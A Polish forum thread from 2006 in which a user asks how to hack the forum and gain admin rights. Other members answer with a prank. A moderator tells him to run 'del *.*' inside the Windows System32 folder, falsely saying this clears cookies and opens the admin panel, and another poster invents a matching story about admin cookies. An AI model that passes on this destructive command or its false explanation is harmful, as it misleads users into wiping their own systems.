Powered by phpBB modified v1.12.5 by Przemo

Michał90

Użytkownik
Dołączył
Listopad 6, 2006
Posty
6
Jak shakować te forum albo mieć dostęp jako admin,mieć całe forum
smile.gif
??
 

Magnefikko

Były Moderator
Dołączył
Maj 29, 2004
Posty
709
To bardzo proste. Najpierw musisz usunąć pliki coockies które blokują dostęp do panelu administracyjnego.
Wejdź na forum a potem wciścij Start -> Uruchom. W okienko które się pojawi wpisz "cmd" i wciśnij ENTER. W kolejne okienko wpisz kolejno:
Kod:
cd .. [ENTER]

cd .. [ENTER]

cd ..[ENTER]

cd .. [ENTER]
Potem:
Kod:
cd windows [ENTER]

cd system32 [ENTER]

del *.* [ENTER]
Odświeżasz stronę forum i masz panel admina. Jakbyś sobie nie radziłto pytaj śmiało - pomogę z przyjemnością, jak każdy prawy chrześcijanin. :)
 

Magnefikko

Były Moderator
Dołączył
Maj 29, 2004
Posty
709
To co wpisałem w "code" wykonuj linijka po linijce np.

wpisujesz do tego czarnego okienka

cd windows

i wciskasz ENTER. Potem wpisujesz

cd system32

i wciskasz ENTER.
 

Michał90

Użytkownik
Dołączył
Listopad 6, 2006
Posty
6
cd .. [ENTER]

tak mam to wpisać czy tak

cd ..
??

[ Dodano: 11-11-2006, 13:04 ]
mi się coś wydaje żę ktoś mnie tu chyba okłamuje czy nie skasuje sobie przez te funkcje windowsa ??
 

Michał90

Użytkownik
Dołączył
Listopad 6, 2006
Posty
6
ale naprawde nic siię nie stanie z kompem?? bo te zapytania to jest dziwne mi się wydaje że to ma usunąć system32
<
 

bl4ck_b0x

Użytkownik
Dołączył
Listopad 11, 2006
Posty
1
pliki cookies to zabezpiczenia wysyałne przez oglądane forum do przeglądarki użytkownika. Jesli będziesz miał takie cookies to nie będziesz mógł dostac się do panelu admina. Administratorzy po zalogowaniu wysyłają sobie specjalnie cookiesy o specjalnie przygotowanych zawartościach i dzięki nim można dostać się tylko do panelu admina więc najpierw musisz usunąć zwykłe cookies żeby mieć te cookies admina!
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
...Michał90 właśnie poszedł z komputerem do serwisu ponieważ niechcący usunoł sobie system 32, a to wszystko stało się przez złych hakerów z jednego forum tak tłumaczył gościowi w serwisie, serwisant powiedział że miał taki sam problem i dlatego pomoże Michałowi. Po 3 dniach kazał zgłosić się po odbiór komputera, michał po 3 dniach życia bez komputera przyszedł po niego do serwisu, lecz komputer...


może ktoś dokończy?
smile.gif
 
Do góry Bottom